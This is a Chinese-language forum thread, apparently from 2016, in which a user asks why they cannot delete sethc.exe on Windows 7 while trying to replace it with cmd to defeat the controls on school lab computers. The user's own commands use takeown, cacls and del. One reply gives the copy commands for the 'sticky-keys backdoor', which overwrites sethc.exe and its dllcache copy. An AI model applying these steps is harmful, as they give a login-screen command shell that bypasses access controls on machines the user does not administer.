This topic created in 3516 days ago, the information mentioned may be changed or developed.
takeown /f c:\Windows\System32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
这两步成功了
del /F /S /Q /A c:\Windows\System32\sethc.exe
的时候又拒绝访问了
替换 cmd 学校机房解除控制用,
虚拟机上总是成功的..
WIN7旗舰版
cacls c:\windows\system32\sethc.exe /G administrator:F
这两步成功了
del /F /S /Q /A c:\Windows\System32\sethc.exe
的时候又拒绝访问了
替换 cmd 学校机房解除控制用,
虚拟机上总是成功的..
WIN7旗舰版
Supplement 1 · Sep 19, 2016
找到了个 NSudo.exe..简单暴力
 |
1
popok Sep 19, 2016 via iPhone
你都能进系统了,直接手动替换也行吧。
你替换时观察一下,是不是有系统备份文件,比如 c:\windows\repair\这里,可能自动给你换回来了。 你可以先搜索 c 盘 sethc.exe ,然后搜索结果页不要关,执行你的替换命令,观察结果页里的文件大小变化 |
 |
2
lzhd24 Sep 19, 2016  1
还记得经典的 shift 粘滞键后门吗?
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y |
|
3
popok Sep 19, 2016 via iPhone
好吧,没看仔细。
原来是权限问题,我上一贴回复作废好了。哈哈 |
|
4
popok Sep 19, 2016 via iPhone
你先用 whoami 命令看看你本地登录的帐号是不是 administrator ,然后执行命令后,看看文件所有权里有没有这个
|
Select Language